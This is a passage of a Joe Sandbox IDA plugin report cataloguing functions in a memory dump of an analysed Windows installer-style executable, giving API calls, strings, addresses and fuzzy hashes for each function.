Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastPathTemp
String ID: 4#v$Failed to get temp path.$Failed to set variant value.$variable.cpp
API String ID: 1238063741-2550301277
Opcode ID: a08c9e3c909ca45bb6acac6cda14f69de15ce1205dd3cf71efdd523e428d14f5
Instruction ID: b2d2f7778680bbc57c164e2637a9de3ed2170663fec263ee28abc0acb9176522
Opcode Fuzzy Hash: a08c9e3c909ca45bb6acac6cda14f69de15ce1205dd3cf71efdd523e428d14f5
Instruction Fuzzy Hash: 1001DB71E41338ABE720EB645C4AFAA73D8EB04710F004169FD14F72C1EA685E0546D5

Function 00809555 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

ReleaseSRWLockExclusive, xrefs: 00809594
AcquireSRWLockExclusive, xrefs: 00809584
KERNEL32.DLL, xrefs: 0080956F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 3b919d6bd7eebdd01f387ec0373c9b922d83e58b9a7664d11dee14d736d59ade
Instruction ID: f089816062c9966fccaa9c5d4e46abe7520e607a0190e3047e4fb0c849313a80
Opcode Fuzzy Hash: 3b919d6bd7eebdd01f387ec0373c9b922d83e58b9a7664d11dee14d736d59ade
Instruction Fuzzy Hash: 7901F4B52422325FCFF24E736C815A723C8FA41715311853AE5A1D32C1E711C885D7A0

Function 008009BB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5D8F,00000000), ref: 008009CF
GetProcAddress.KERNEL32(00000000), ref: 008009D6
GetLastError.KERNEL32(?,?,?,007C5D8F,00000000), ref: 008009ED

Strings

kernel32, xrefs: 008009C7
procutil.cpp, xrefs: 00800A0E
IsWow64Process, xrefs: 008009C0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: IsWow64Process$kernel32$procutil.cpp
API String ID: 4275029093-1586155540
Opcode ID: d6340b80b38eb513bbdc44b4d3cf07d20b7e040df3cd212ac7737af327e1892c
Instruction ID: 1f2ae109f96076927ef1d1959d7b7f64b923b16ad791e55f50fb7988c18fe99e
Opcode Fuzzy Hash: d6340b80b38eb513bbdc44b4d3cf07d20b7e040df3cd212ac7737af327e1892c
Instruction Fuzzy Hash: D3F04F72B01739AFE7609BA59C09AAB7A98FF05751B008115BD15E7280E7748E00CBE1

Function 007FA059 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F3382,007F3382,?,?,?,007FA2AA,00000001,00000001,E3E85006), ref: 007FA0B3
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007FA2AA,00000001,00000001,E3E85006,?,?,?), ref: 007FA139
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,E3E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007FA233
__freea.LIBCMT ref: 007FA240

Part of subcall function 007F5154: HeapAlloc.KERNEL32(00000000,?,?,?,007F1E90,?,0000015D,?,?,?,?,007F32E9,000000FF,00000000,?,?), ref: 007F5186

__freea.LIBCMT ref: 007FA249
__freea.LIBCMT ref: 007FA26E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: dabeeff93e758a130ded372ed2dd1fd7d262bf6eab67f023ccd1620f438edc5a
Instruction ID: cb84499bd6b5c619b177480eb6ead5f121ca0d9988dbf119036c039dfbc7677b
Opcode Fuzzy Hash: dabeeff93e758a130ded372ed2dd1fd7d262bf6eab67f023ccd1620f438edc5a
Instruction Fuzzy Hash: D751E6B270020EBFDB258F64DC85EBB77A9FB84750F154229FE08D6241EB39DC408661

Function 007DF6B8 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007DF6D0
LeaveCriticalSection.KERNEL32(?,?), ref: 007DF81D

Strings

Failed to recreate command-line for update bundle., xrefs: 007DF79C
Failed to default local update source, xrefs: 007DF742
update\%ls, xrefs: 007DF72E
Failed to set update bundle., xrefs: 007DF7F3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
API String ID: 3168844106-1266646976
Opcode ID: c161aa12edd018ae7c180cf44e7c14287299a325f38063a98776269a8522c36f
Instruction ID: bb3a343dd84493863dc31d7ebb94a6f4661a2915fa5c5e74a87fdd965f5f6510
Opcode Fuzzy Hash: c161aa12edd018ae7c180cf44e7c14287299a325f38063a98776269a8522c36f
Instruction Fuzzy Hash: AF416A31940209EFDF119F94CC49EEA77B8FF04320F41817AF906A7261D779AD609B91

Function 007D8AA3 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,00000000,00000000), ref: 007D8B0F

Strings

per-machine, xrefs: 007D8B62, 007D8B6F, 007D8BA3, 007D8BB0
Failed to calculate cache path., xrefs: 007D8ACC
Failed to get %hs package cache root directory., xrefs: 007D8B70
per-user, xrefs: 007D8B67, 007D8BA8
Failed to get old %hs package cache root directory., xrefs: 007D8BB1

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Sleep
String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
API String ID: 3472027048-398165853
Opcode ID: 9315062cd44628528dea4d6685f98604ae447e602ce1b67bdfe73a3939a179fe
Instruction ID: 1e7706198354d5c87a4b4ee6f7ae65062e1567bfc97fa5a2a931b3a5ca33e114
Opcode Fuzzy Hash: 9315062cd44628528dea4d6685f98604ae447e602ce1b67bdfe73a3939a179fe
Instruction Fuzzy Hash: 1131C4F2A00219FBEB51AA648C46FBFB67DEF00710F15002BFD05E6341EA7D9D5156A2

Function 007DE705 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 007DE734
SetWindowLongW.USER32(?,000000EB,00000000), ref: 007DE743
SetWindowLongW.USER32(?,000000EB,?), ref: 007DE757
DefWindowProcW.USER32(?,?,?,?), ref: 007DE767
GetWindowLongW.USER32(?,000000EB), ref: 007DE781
PostQuitMessage.USER32(00000000), ref: 007DE7DE

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: 1ee7e7f952f11ef5ce960e9c54ed4e69a9e39f4943f9224ef89b7c231ee9c204
Instruction ID: 8a1a494b9af6f3d2f9d4ab1fbbd1e2d6bafe3b463610714c17010e2554c656c2
Opcode Fuzzy Hash: 1ee7e7f952f11ef5ce960e9c54ed4e69a9e39f4943f9224ef89b7c231ee9c204
Instruction Fuzzy Hash: 3C21CF32104219BFDB52AFA4DD48E6A3BB9FF44360F254125F90AAA3A0C735DD10DB61

Function 007DC59C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?), ref: 007DC5E4
CloseHandle.KERNEL32(?), ref: 007DC5EC

Strings

Failed to save state., xrefs: 007DC661
elevation.cpp, xrefs: 007DC788
Unexpected elevated message sent to child process, msg: %u, xrefs: 007DC794

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
API String ID: 4207627910-1576875097
Opcode ID: a5bff4c5f6c246727f6558a1b075a76eb7ccdaf756911b186c28469eb9e9f06f
Instruction ID: 9bb5401792876dbe3699a77ac019c1ad6a5c548e3179310b634abd75591448ee
Opcode Fuzzy Hash: a5bff4c5f6c246727f6558a1b075a76eb7ccdaf756911b186c28469eb9e9f06f
Instruction Fuzzy Hash: CA61E63A100505FFCB225F94CD46C56BBB2FF08320715C55AFAAA5A672C736E921EF41

Function 008010C5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008010ED
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,007D6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 00801126
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0080121A

Strings

regutil.cpp, xrefs: 00801161
BundleUpgradeCode, xrefs: 008010CC

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: 9d64b3400dd2c4799c2b1d0951d6e14bdc784c089dffad5cf4026170551eb7b2
Instruction ID: 477bb70b9ba314287eaa5deffe80cfca4e381f1e61bb99e092d05888d980a59e
Opcode Fuzzy Hash: 9d64b3400dd2c4799c2b1d0951d6e14bdc784c089dffad5cf4026170551eb7b2
Instruction Fuzzy Hash: F2418F31A0021AEBDF65DF99CC89AAEB7B9FF44720B514169E915EB290D630DD018BA0

Function 008061FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008047D3: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,007D8564,00000000,00000000,00000000,00000000,00000000), ref: 008047EB
Part of subcall function 008047D3: GetLastError.KERNEL32(?,?,?,007D8564,00000000,00000000,00000000,00000000,00000000), ref: 008047F5

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00805AC5,?,?,?,?,?,?,?,00010000,?), ref: 00806263
WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00805AC5,?,?,?,?), ref: 008062B5
GetLastError.KERNEL32(?,00805AC5,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008062FB
GetLastError.KERNEL32(?,00805AC5,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00806321

Strings

dlutil.cpp, xrefs: 00806345

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$Write$Pointer
String ID: dlutil.cpp
API String ID: 133221148-2067379296
Opcode ID: b3fea2de1a1421bcde323d66f36f2fc0def7f5aa62bde40e7a310f3b35c6321f
Instruction ID: 3d56896bcbd15676eb11d4ad123ee7de3401e128e598e845cc9bda77a26f060e
Opcode Fuzzy Hash: b3fea2de1a1421bcde323d66f36f2fc0def7f5aa62bde40e7a310f3b35c6321f
Instruction Fuzzy Hash: AF418D72A00219FFEB518F98CD45BAA7BA8FF04360F154129BD04E6190E771DD70DBA0

Function 007C2436 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,007FFEE7,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,007FFEE7,?,00000000,00000000), ref: 007C247C
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,007FFEE7,?,00000000,00000000,0000FDE9), ref: 007C2488

Part of subcall function 007C3B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21DC,000001C7,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C3B59
Part of subcall function 007C3B51: HeapSize.KERNEL32(00000000,?,007C21DC,000001C7,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C3B60

Strings

strutil.cpp, xrefs: 007C24AC

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: 7b561f0ba87535698f39946ed5df7167b30c519731ffbc3804f2da1c5961b40c
Instruction ID: 4369511c6b6de26c1529bf5046cdf973146dffbc751f2d7681a18306fcd2c5e2
Opcode Fuzzy Hash: 7b561f0ba87535698f39946ed5df7167b30c519731ffbc3804f2da1c5961b40c
Instruction Fuzzy Hash: 4631D271200349AFEB049E688C84F7B33DDFB44764B10822DFD25DB2A2EB69CD518764

Function 007EAAE8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract all payloads from container: %ls, xrefs: 007EAB9C
Failed to open container: %ls., xrefs: 007EAB2A
Failed to extract payload: %ls from container: %ls, xrefs: 007EABE3
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 007EABEF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
API String ID: 1214770103-3891707333
Opcode ID: 35246d375afe7b223468edac189da37e72b897379801550d28f8c2e413f9b822
Instruction ID: 2e55daf2aafbadeeacc790d8321c1ca5736e8e8c816e9468d61e245cfbd2e7a5
Opcode Fuzzy Hash: 35246d375afe7b223468edac189da37e72b897379801550d28f8c2e413f9b822
Instruction Fuzzy Hash: 8B31D672D01159FBCF129AE5CC46E8E7779EF08320F100229FD21A6191E739E965DB92

Function 008040C8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,00804203,00000003,00000001,00000001,000007D0,00000003,00000000,?,007D9E5F,00000000), ref: 008040ED
GetLastError.KERNEL32(00000001,?,00804203,00000003,00000001,00000001,000007D0,00000003,00000000,?,007D9E5F,00000000,000007D0,00000001,00000001,00000003), ref: 008040FC
MoveFileExW.KERNEL32(00000003,00000001,000007D0,00000001,00000000,?,00804203,00000003,00000001,00000001,000007D0,00000003,00000000,?,007D9E5F,00000000), ref: 0080417F
GetLastError.KERNEL32(?,00804203,00000003,00000001,00000001,000007D0,00000003,00000000,?,007D9E5F,00000000,000007D0,00000001,00000001,00000003,000007D0), ref: 00804189

Strings

fileutil.cpp, xrefs: 008041A7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastMove
String ID: fileutil.cpp
API String ID: 55378915-2967768451
Opcode ID: 32564e0d6979e03382af8649375a70121d71f4d2248335033b26125035fe7227
Instruction ID: be241a684b86ec1f9984219608627d9c38cefb790fb780ecaa9f3db4f9b8db57
Opcode Fuzzy Hash: 32564e0d6979e03382af8649375a70121d71f4d2248335033b26125035fe7227
Instruction Fuzzy Hash: D22107B6680336ABDB611F649C4177F7699FF617A1F02512AFE05D71D0D7308C9192E0

Function 00804212 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00804315: FindFirstFileW.KERNEL32(007E8FFA,?,000002C0,00000000,00000000), ref: 00804350
Part of subcall function 00804315: FindClose.KERNEL32(00000000), ref: 0080435C

RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll), ref: 00804305

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

Part of subcall function 008010C5: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008010ED
Part of subcall function 008010C5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,007D6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 00801126

Strings

crypt32.dll, xrefs: 0080423D
PendingFileRenameOperations, xrefs: 00804270
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00804244
\, xrefs: 0080428E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseFindQueryValue$FileFirstOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
API String ID: 3397690329-3978359083
Opcode ID: c626880bb72e16e1aa2ab64b8ae97bc85ffb7287083959159e4416d818fc1df1
Instruction ID: 0812e0eacc84c866d68d47821ba34442f12140151f5629dc08c7af6e436df0e6
Opcode Fuzzy Hash: c626880bb72e16e1aa2ab64b8ae97bc85ffb7287083959159e4416d818fc1df1
Instruction Fuzzy Hash: F331E0B5B40219EBDF60AFC6CC41AAEB779FF00350F14916AFA08E6191D3309A80CB50

Function 007CEEF9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,007D04CB,00000001,00000001,00000001,007D04CB,00000000), ref: 007CEF70
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,007D04CB,00000001,00000001,00000001,007D04CB,00000000,00000001,00000002,007D04CB,00000001), ref: 007CEF87

Strings

Failed to format key for update registration., xrefs: 007CEF26
PackageVersion, xrefs: 007CEF51
Failed to remove update registration key: %ls, xrefs: 007CEFB4

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: 1596338dfbace088cc76cc1fc4b34f89e47d0ee40eb0fbd5bfe2664209eae9ed
Instruction ID: 1e6647ef372c44e51edf7a5c08b653a9d52ba6ccb2ae8c1ed8100d946a1b0dbe
Opcode Fuzzy Hash: 1596338dfbace088cc76cc1fc4b34f89e47d0ee40eb0fbd5bfe2664209eae9ed
Instruction Fuzzy Hash: 56219432A00618BBDB619AA4CC45FDFBBB8FF04721F11417DF914E6190E7389E909A90

Function 007CEE0F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007CEE4A

Part of subcall function 00804038: SetFileAttributesW.KERNEL32(007E8FFA,00000080,00000000,007E8FFA,000000FF,00000000,?,?,007E8FFA), ref: 00804067
Part of subcall function 00804038: GetLastError.KERNEL32(?,?,007E8FFA), ref: 00804071

Part of subcall function 007C3B6A: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,007CEE95,00000001,00000000,00000095,00000001,007D04DA,00000095,00000000,swidtag,00000001), ref: 007C3B87

Strings

swidtag, xrefs: 007CEE59
Failed to allocate regid file path., xrefs: 007CEEA9
Failed to format tag folder path., xrefs: 007CEEB7
Failed to allocate regid folder path., xrefs: 007CEEB0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AttributesDirectoryErrorFileLastOpen@16Remove
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
API String ID: 1428973842-4170906717
Opcode ID: bd176f33a678ceb4ed5bbddad64c7ab161df8735ce0ca149e1a583bc89a9a4ff
Instruction ID: 80030209098a91159b8c4942436c10385c76ca218aafcf4edc411a37d04d68f0
Opcode Fuzzy Hash: bd176f33a678ceb4ed5bbddad64c7ab161df8735ce0ca149e1a583bc89a9a4ff
Instruction Fuzzy Hash: 2721AB32900518FBDB15EB99CC01F9EBBB9EF44750F1081AEE914A62A1DB399E819B50

Function 007E8B73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

